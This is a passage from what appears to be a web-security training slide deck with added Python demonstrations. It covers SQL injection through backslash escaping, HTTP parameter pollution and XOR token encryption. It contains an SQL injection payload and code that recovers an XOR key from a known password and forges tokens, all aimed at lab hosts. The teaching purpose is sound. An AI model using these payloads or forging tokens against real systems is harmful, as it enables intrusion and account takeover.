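    return (s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
             .replace('"', "&quot;").replace("'", "&#039;"))


# Model of mysql_real_escape_string: the backslash itself is escaped, so it can no longer eat a quote.
def mysql_escape(s):
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def build_insert(code, fix, sanitize):
    """Same string concatenation as the add.php snippet, with a pluggable filter."""
    return "INSERT INTO track (bug,fix) VALUES ('%s','%s')" % (sanitize(code), sanitize(fix))


def tokenize(sql):
    """Split a MySQL statement into ('code'|'string'|'comment', text).

    Inside a single-quoted literal a backslash escapes the next character and
    '' is a doubled quote; '-- ' and '#' start a comment that runs to end of line.
    """
    tokens, buf, i, n = [], "", 0, len(sql)
    while i < n:
        c = sql[i]
        if c == "'":
            if buf:
                tokens.append(("code", buf))
                buf = ""
            j, lit = i + 1, "'"
            while j < n:
                ch = sql[j]
                if ch == "\\" and j + 1 < n:                        # escape: take both chars
                    lit += sql[j:j + 2]
                    j += 2
                elif ch == "'" and j + 1 < n and sql[j + 1] == "'":  # doubled quote
                    lit += "''"
                    j += 2
                elif ch == "'":                                      # closing quote
                    lit += "'"
                    j += 1
                    break
                else:
                    lit += ch
                    j += 1
            tokens.append(("string", lit))
            i = j
        elif sql.startswith("-- ", i) or c == "#":
            if buf:
                tokens.append(("code", buf))
                buf = ""
            j = sql.find("\n", i)
            j = n if j == -1 else j
            tokens.append(("comment", sql[i:j]))
            i = j
        else:
            buf += c
            i += 1
    if buf:
        tokens.append(("code", buf))
    return tokens


def executed_sql(sql):
    """Everything MySQL would treat as SQL rather than as string data or comment."""
    return "".join(text for kind, text in tokenize(sql) if kind == "code")


# Constructed attacker input following the slide: trailing backslash in 'code', payload in 'fix'.
CODE = "a\\"
FIX = ", user()); -- 1"

if __name__ == "__main__":
    for name, sanitize in (("quote filter only", html_quotes_filter), ("backslash escaped", mysql_escape)):
        q = build_insert(CODE, FIX, sanitize)
        print(name, "->", q)
        for kind, text in tokenize(q):
            print("   %-8s %s" % (kind, text))
```

With the quote-only filter the tokens come out as code, one string (`'a\','`), code containing `, user());` and a comment; with the backslash escaped there are two intact string literals and `user()` never leaves the data.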
  • 17. HTTP Parameter Pollution. HTTP Parameter Pollution is a vulnerability caused by the fact that different platforms (the web server and the web application language) process a sequence of HTTP request parameters with the same name differently.
  • 18. HTTP Parameter Pollution. How platforms interpret a repeated parameter (request par1=val1&par1=val2):
    Technology / Environment                     | Interpretation of repeated parameters | Example
    ASP.NET / IIS                                | Concatenated with a comma             | par1=val1,val2
    ASP / IIS                                    | Concatenated with a comma             | par1=val1,val2
    PHP / Apache                                 | Last parameter wins                   | par1=val2
    PHP / Zeus                                   | Last parameter wins                   | par1=val2
    JSP, Servlet / Apache Tomcat                 | First parameter wins                  | par1=val1
    JSP, Servlet / Oracle Application Server 10g | First parameter wins                  | par1=val1
    JSP, Servlet / Jetty                         | First parameter wins                  | par1=val1
    IBM Lotus Domino                             | First parameter wins                  | par1=val1
    IBM HTTP Server                              | Last parameter wins                   | par1=val2
    mod_perl, libapreq2 / Apache                 | First parameter wins                  | par1=val1
    Perl CGI / Apache                            | First parameter wins                  | par1=val1
    mod_perl / Apache                            | First parameter wins                  | par1=val1
    mod_wsgi (Python) / Apache                   | Returns an array                      | ARRAY(0x8b9058c)
    Python / Zope                                | First parameter wins                  | par1=val1
    IceWarp                                      | Returns an array                      | ['val1','val2']
    AXIS 2400                                    | Last parameter wins                   | par1=val2
    Linksys Wireless-G PTZ Internet Camera       | Concatenated with a comma             | par1=val1,val2
    Ricoh Aficio 1022 Printer                    | Last parameter wins                   | par1=val2
    webcamXP Pro                                 | First parameter wins                  | par1=val1
    DBMan                                        | Concatenated with two tildes          | par1=val1~~val2
  • 19. HTTP Parameter Pollution. In PHP, an interesting setting is variables_order in php.ini (it establishes the order in which the GET, POST and Cookie arrays are processed and merged into $_REQUEST). Why is it interesting? For the request
      GET /?id=1
      Cookie: id=2
    the result is:
      $_GET['id'] = 1
      $_REQUEST['id'] = 2
    The frequent error in request processing: $_GET is checked, but the value is then taken from $_REQUEST.
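Slides 18 and 19 together explain the two halves of HPP: how a stack resolves a repeated parameter name, and how PHP's $_REQUEST merges its sources in a fixed order so that a later source silently overrides an earlier one. The Python below is an added example (not the deck's code) that models both and reproduces the check-$_GET-but-use-$_REQUEST bug on constructed data; the selected platform rows, ALLOWED_IDS and the handler names are illustrative.

```python
from urllib.parse import parse_qsl

# A few representative rows from the slide 18 table, as resolution policies.
PLATFORM_POLICY = {
    "ASP.NET/IIS": "comma",
    "PHP/Apache": "last",
    "JSP, Servlet/Apache Tomcat": "first",
    "mod_wsgi (Python)/Apache": "array",
    "DBMan": "tildes",
}


def resolve(query, policy):
    """Return the parameter dict a platform with the given policy exposes for `query`."""
    out = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if policy == "first":
            out.setdefault(name, value)
        elif policy == "last":
            out[name] = value
        elif policy == "comma":
            out[name] = value if name not in out else out[name] + "," + value
        elif policy == "tildes":
            out[name] = value if name not in out else out[name] + "~~" + value
        elif policy == "array":
            out.setdefault(name, []).append(value)
        else:
            raise ValueError("unknown policy %r" % policy)
    return out


def php_request(get, post, cookie, order="GPC"):
    """Model of PHP's $_REQUEST: the G, P and C arrays are merged in `order`; a later
    source overwrites an earlier one, so with "GPC" a cookie wins over a query parameter."""
    sources = {"G": get, "P": post, "C": cookie}
    merged = {}
    for letter in order:
        merged.update(sources[letter])
    return merged


# Constructed application logic reproducing the slide 19 mistake.
ALLOWED_IDS = {"1", "3"}


def vulnerable_handler(get, post, cookie):
    if get.get("id") not in ALLOWED_IDS:          # validation looks at $_GET ...
        return "denied"
    return "record " + php_request(get, post, cookie)["id"]   # ... the value comes from $_REQUEST


def fixed_handler(get):
    value = get.get("id")
    if value not in ALLOWED_IDS:                  # validate and use the same source
        return "denied"
    return "record " + value


if __name__ == "__main__":
    for platform, policy in PLATFORM_POLICY.items():
        print("%-28s %s" % (platform, resolve("par1=val1&par1=val2", policy)))
    print("vulnerable:", vulnerable_handler({"id": "1"}, {}, {"id": "2"}))
    print("fixed     :", fixed_handler({"id": "1"}))
```

Two consequences follow from the model: a WAF or front-end that validates using one policy (say, first wins) protects nothing when the application behind it uses another (last wins), and any check must read the same array the code later consumes.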
  • 20. HTTP Parameter Pollution. Exploitation • Real-life example (www.blogger.com blog service). The vulnerability was reported under the «Rewarding web application security research» program. Error in input processing: the first matching value is checked, but the result uses the last one. Presumably the check is performed on QUERY_STRING and the variable is then assigned from the array built from the request data.
  • 21. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/index.php
  • 22. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/register.php
  • 23. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/invite.php
  • 24. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/invite.php
  • 25. HTTP Parameter Pollution. Exploitation • Practical task: http://blogger.local/invite.php. gpc_order (php.ini) = "GPC": GET, POST and Cookie data are merged in that order, so the Cookie value is the one that wins.
  • 26. HTTP Parameter Pollution Exploitation • Practical task http://blogger.local/add.php
  • 27. Reversible Encryption. Reversible encryption in web applications is potentially insecure: once the attacker recovers the key (or the scheme is weak enough to give it up), every protected value can be decrypted and new values can be forged, which can be used in: • Exploitation of an SQL Injection vulnerability; • Information disclosure (database dump); • Arbitrary file reading; • and so on.
  • 28. Reversible Encryption. Exploitation • Practical task: http://portal.local
  • 29. Reversible Encryption. Exploitation • Practical task: http://portal.local
  • 30. Reversible Encryption. Exploitation • Practical task: http://portal.local
  • 31. Reversible Encryption. Exploitation • Practical task: http://portal.local/news.php
  • 32. Reversible Encryption. Exploitation • Practical task: http://portal.local/news.php
  • 33. Reversible Encryption. Exploitation • Practical task: http://portal.local/news.php
  • 34. Reversible Encryption. Exploitation • Practical task: http://portal.local/
  • 35. Reversible Encryption. Exploitation • Practical task: http://portal.local/ and http://portal.local/xor_tool/
  • 36. Reversible Encryption. Exploitation • Practical task: http://portal.local/ FAILED.
  • 37. Reversible Encryption. Exploitation • Practical task: http://portal.local/ 1. A "test" user is registered with the password "12345678910qwerty". 2. The encoded value shown for test: UFBQR1FQRk9cQ0QIFgcRBx0= (Base64 of 17 bytes, the same length as the password).
  • 38. Reversible Encryption. Exploitation • Practical task: http://portal.local/ and http://portal.local/xor_tool/
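Slide 37 pairs a known password with its encoded value, which is the known-plaintext situation a tester looks for. The Python below is an added example (not the deck's xor_tool) of what to do with that pair under the assumption that the value is the Base64 of the password XORed with a repeating key: XOR ciphertext and plaintext to obtain the keystream, look for its shortest period, and use the recovered key to decrypt or forge other values. The password and token are the slide's; the repeating-key assumption and the forged sample plaintext are this example's. A ciphertext exactly as long as the plaintext is itself the first hint of a stream or XOR construction.

```python
import base64
from itertools import cycle

# Values from slide 37.
PASSWORD = "12345678910qwerty"
TOKEN_B64 = "UFBQR1FQRk9cQ0QIFgcRBx0="


def xor_bytes(data, key):
    """XOR `data` with `key` repeated as often as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def recover_keystream(plaintext, token_b64):
    """Known plaintext: ciphertext XOR plaintext gives the keystream byte for byte."""
    ct = base64.b64decode(token_b64)
    pt = plaintext.encode()
    if len(ct) != len(pt):
        raise ValueError("length mismatch: not a plain XOR of the password")
    return xor_bytes(ct, pt)


def shortest_period(ks):
    """Smallest p such that ks[i] == ks[i % p] for all i (len(ks) if it never repeats)."""
    for p in range(1, len(ks) + 1):
        if all(ks[i] == ks[i % p] for i in range(len(ks))):
            return p
    return len(ks)


def recover_key(plaintext, token_b64):
    """The repeating key, i.e. one period of the recovered keystream (assumption: repeating-key XOR)."""
    ks = recover_keystream(plaintext, token_b64)
    return ks[:shortest_period(ks)]


def encrypt(plaintext, key):
    """Forge a token for arbitrary plaintext with the recovered key."""
    return base64.b64encode(xor_bytes(plaintext.encode(), key)).decode()


def decrypt(token_b64, key):
    return xor_bytes(base64.b64decode(token_b64), key).decode()


if __name__ == "__main__":
    ks = recover_keystream(PASSWORD, TOKEN_B64)
    key = recover_key(PASSWORD, TOKEN_B64)
    print("keystream :", ks)              # repeats after 12 bytes
    print("key       :", key, "period", len(key))
    print("round trip:", decrypt(TOKEN_B64, key) == PASSWORD)
    print("forged    :", encrypt("admin:letmein", key))
```

If the period found is shorter than the plaintext, the key is fully recovered and tokens of any length can be forged; if the keystream never repeats, the scheme may still be broken for other accounts whose plaintext length does not exceed the known one, since the first bytes of the keystream are known regardless.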
  • 39. Instead of conclusions. What's next? • Try to do the practical tasks • Take part in competitions
  • 40. Thank you for your attention! Questions? ygoltsev@ptsecurity.ru